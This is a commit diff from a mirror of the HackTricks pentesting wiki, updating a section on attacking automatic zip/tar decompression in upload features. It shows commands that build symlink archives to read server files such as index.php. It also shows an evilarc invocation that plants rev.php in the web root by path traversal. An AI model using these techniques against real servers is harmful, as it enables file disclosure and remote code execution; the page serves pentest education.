mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-15 01:17:36 +00:00
GitBook: [#2892] update
This commit is contained in:
parent
4015277646
commit
316bcad4b2
1 changed files with 5 additions and 3 deletions
|
@ -169,7 +169,7 @@ Here’s a top 10 list of things that you can achieve by uploading (from [link](
|
||||||
|
|
||||||
Refer to [https://en.wikipedia.org/wiki/List\_of\_file\_signatures](https://en.wikipedia.org/wiki/List\_of\_file\_signatures) for other filetypes.
|
Refer to [https://en.wikipedia.org/wiki/List\_of\_file\_signatures](https://en.wikipedia.org/wiki/List\_of\_file\_signatures) for other filetypes.
|
||||||
|
|
||||||
## Zip File Automatically decompressed Upload
|
## Zip/Tar File Automatically decompressed Upload
|
||||||
|
|
||||||
If you can upload a ZIP that is going to be decompressed inside the server, you can do 2 things:
|
If you can upload a ZIP that is going to be decompressed inside the server, you can do 2 things:
|
||||||
|
|
||||||
|
@ -180,6 +180,7 @@ Upload a link containing soft links to other files, then, accessing the decompre
|
||||||
```
|
```
|
||||||
ln -s ../../../index.php symindex.txt
|
ln -s ../../../index.php symindex.txt
|
||||||
zip --symlinks test.zip symindex.txt
|
zip --symlinks test.zip symindex.txt
|
||||||
|
tar -cvf test.tar symindex.txt
|
||||||
```
|
```
|
||||||
|
|
||||||
### Decompress in different folders
|
### Decompress in different folders
|
||||||
|
@ -188,10 +189,11 @@ The decompressed files will be created in unexpected folders.
|
||||||
|
|
||||||
One could easily assume that this setup protects from OS-level command execution via malicious file uploads but unfortunately this is not true. Since ZIP archive format supports hierarchical compression and we can also reference higher level directories we can escape from the safe upload directory by abusing the decompression feature of the target application.
|
One could easily assume that this setup protects from OS-level command execution via malicious file uploads but unfortunately this is not true. Since ZIP archive format supports hierarchical compression and we can also reference higher level directories we can escape from the safe upload directory by abusing the decompression feature of the target application.
|
||||||
|
|
||||||
An automated exploit to create this kind of files can be found here: [https://github.com/ptoomey3/evilarc](https://github.com/ptoomey3/evilarc)
|
An automated exploit to create this kind of files can be found here: [**https://github.com/ptoomey3/evilarc**](https://github.com/ptoomey3/evilarc)****
|
||||||
|
|
||||||
```python
|
```python
|
||||||
python evilarc.py -o unix -d 5 -p /var/www/html/ rev.php
|
python2 evilarc.py -h
|
||||||
|
python2 evilarc.py -o unix -d 5 -p /var/www/html/ rev.php
|
||||||
```
|
```
|
||||||
|
|
||||||
Some python code to create a malicious zip:
|
Some python code to create a malicious zip:
|
||||||
|
|
Loading…
Reference in a new issue